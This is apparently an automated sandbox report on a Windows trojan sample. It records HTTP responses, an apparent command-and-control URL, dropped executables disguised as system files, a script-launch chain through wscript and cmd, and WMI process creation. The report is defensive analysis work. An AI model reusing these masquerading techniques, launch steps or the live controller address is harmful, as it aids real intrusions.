                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:49:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95yMMf7ma3E42dD%2FBGaUArvuFurjVD00Kmh2Lc84eDpsM3ShOL904jZykdR8XW4eqskvOj5jc0oKjc7ngh%2BzIHQF9PpoO6aeb%2BUtlC49w2b4lg3SFiDELvcCnjhEevmPu5eIR17ra%2FQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9519e61834184d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1515&rtt_var=11501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=32265&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:49:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzSfThgCKVTshNWhuA%2FIL5VmW6oMDdBw1fQ9hM9zx7e6IvM8Dzn0iEk6cQjIUOWv3HKCKSbHOJRXMI2XKbC2ODzGDdsjJ08RoJ6fcCBQGcv5oc0c%2BD%2BHpdnr%2FAATaOb5hno7k0%2BgVSE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f951a1e7efdc481-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3890&min_rtt=1502&rtt_var=5340&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=70835&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:49:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7cn30SK6QwT3L4N1bHvSfemvPJDHwqCadhDh%2F5vTEbhHsPMGxYSt9rncXqGLuSOQT1%2FNtlyywGDdJFBm3TLtMtdsnpqJol%2BjUiFa90ivWNmKl7w1oSFd0mP93hsOUp0PR7bSr%2F1I7I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f951a32ad957d08-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1925&rtt_var=3444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=113928&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: smartscreen.exe, 0000002A.00000002.2137127393.0000000003296000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://001031cm.nyashteam.ru
                                    Source: smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://001031cm.nyashteam.ru/
                                    Source: smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php
                                    Source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: dwm.exe, 00000024.00000002.2180283399.0000000002C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00426FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00426FAA
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Windows\Resources\Themes\smartscreen.exeJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Windows\Resources\Themes\2afe4ed40d5a86Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042848E0_2_0042848E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004240FE0_2_004240FE
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004340880_2_00434088
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004300B70_2_004300B7
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004371530_2_00437153
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004451C90_2_004451C9
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004362CA0_2_004362CA
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004232F70_2_004232F7
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004343BF0_2_004343BF
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0044D4400_2_0044D440
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042F4610_2_0042F461
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042C4260_2_0042C426
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004377EF0_2_004377EF
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042286B0_2_0042286B
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0044D8EE0_2_0044D8EE
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_004519F40_2_004519F4
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042E9B70_2_0042E9B7
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00436CDC0_2_00436CDC
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00433E0B0_2_00433E0B
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042EFE20_2_0042EFE2
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00444F9A0_2_00444F9A
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B780D487_2_00007FFD9B780D48
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B780E437_2_00007FFD9B780E43
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9BB2A0027_2_00007FFD9BB2A002
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9BB292567_2_00007FFD9BB29256
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 33_2_00007FFD9B750D4833_2_00007FFD9B750D48
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 33_2_00007FFD9B750E4333_2_00007FFD9B750E43
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B7B114134_2_00007FFD9B7B1141
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B7BD23334_2_00007FFD9B7BD233
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B7B117534_2_00007FFD9B7B1175
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B7B988434_2_00007FFD9B7B9884
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B7902AD34_2_00007FFD9B7902AD
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B780D4834_2_00007FFD9B780D48
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeCode function: 34_2_00007FFD9B780E4334_2_00007FFD9B780E43
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B760D4835_2_00007FFD9B760D48
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B760E4335_2_00007FFD9B760E43
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B79114135_2_00007FFD9B791141
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B79D23335_2_00007FFD9B79D233
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B79117535_2_00007FFD9B791175
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B79988435_2_00007FFD9B799884
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B7702AD35_2_00007FFD9B7702AD
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7902AD36_2_00007FFD9B7902AD
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B114136_2_00007FFD9B7B1141
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7BD23336_2_00007FFD9B7BD233
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B117536_2_00007FFD9B7B1175
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B988436_2_00007FFD9B7B9884
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B780D4836_2_00007FFD9B780D48
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B780E4336_2_00007FFD9B780E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7A02AD37_2_00007FFD9B7A02AD
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C114137_2_00007FFD9B7C1141
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7CD23337_2_00007FFD9B7CD233
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C117537_2_00007FFD9B7C1175
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C988437_2_00007FFD9B7C9884
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B790D4837_2_00007FFD9B790D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B790E4337_2_00007FFD9B790E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 38_2_00007FFD9B760D4838_2_00007FFD9B760D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 38_2_00007FFD9B760E4338_2_00007FFD9B760E43
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B780D4839_2_00007FFD9B780D48
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B780E4339_2_00007FFD9B780E43
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7902AD39_2_00007FFD9B7902AD
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B114139_2_00007FFD9B7B1141
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7BD23339_2_00007FFD9B7BD233
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B117539_2_00007FFD9B7B1175
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B988439_2_00007FFD9B7B9884
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 40_2_00007FFD9B790D4840_2_00007FFD9B790D48
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 40_2_00007FFD9B790E4340_2_00007FFD9B790E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B780D4841_2_00007FFD9B780D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B780E4341_2_00007FFD9B780E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B114141_2_00007FFD9B7B1141
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7BD23341_2_00007FFD9B7BD233
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B117541_2_00007FFD9B7B1175
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B988441_2_00007FFD9B7B9884
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7902AD41_2_00007FFD9B7902AD
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9B770D4842_2_00007FFD9B770D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9B770E4342_2_00007FFD9B770E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9BB14F0442_2_00007FFD9BB14F04
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B7702AD43_2_00007FFD9B7702AD
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B760D4843_2_00007FFD9B760D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B760E4343_2_00007FFD9B760E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79114143_2_00007FFD9B791141
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79D23343_2_00007FFD9B79D233
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79117543_2_00007FFD9B791175
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79988443_2_00007FFD9B799884
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7802AD44_2_00007FFD9B7802AD
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B770D4844_2_00007FFD9B770D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B770E4344_2_00007FFD9B770E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A114144_2_00007FFD9B7A1141
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7AD23344_2_00007FFD9B7AD233
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A117544_2_00007FFD9B7A1175
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A988444_2_00007FFD9B7A9884
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\etRRuFlx.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: String function: 0043EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: String function: 0043F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: String function: 0043EC50 appears 56 times
                                    Source: EjS7Q5fFCE.exe, 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exe, 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Portsessionsvc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iEIWJugOSvvEyboGDFYpQ.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ctfmon.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@59/32@1/1
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00426C74 GetLastError,FormatMessageW,0_2_00426C74
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0043A6C2
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Users\user\Desktop\kwWqKlvO.logJump to behavior
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-5T1XqD41gjMZTLBOC4hB
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Users\user\AppData\Local\Temp\jgewpxd5Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCommand line argument: sfxname0_2_0043DF1E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCommand line argument: sfxstime0_2_0043DF1E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCommand line argument: STARTDLG0_2_0043DF1E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCommand line argument: xzG0_2_0043DF1E
                                    Source: EjS7Q5fFCE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: EjS7Q5fFCE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: EjS7Q5fFCE.exeReversingLabs: Detection: 62%
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeFile read: C:\Users\user\Desktop\EjS7Q5fFCE.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\EjS7Q5fFCE.exe "C:\Users\user\Desktop\EjS7Q5fFCE.exe"
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe"
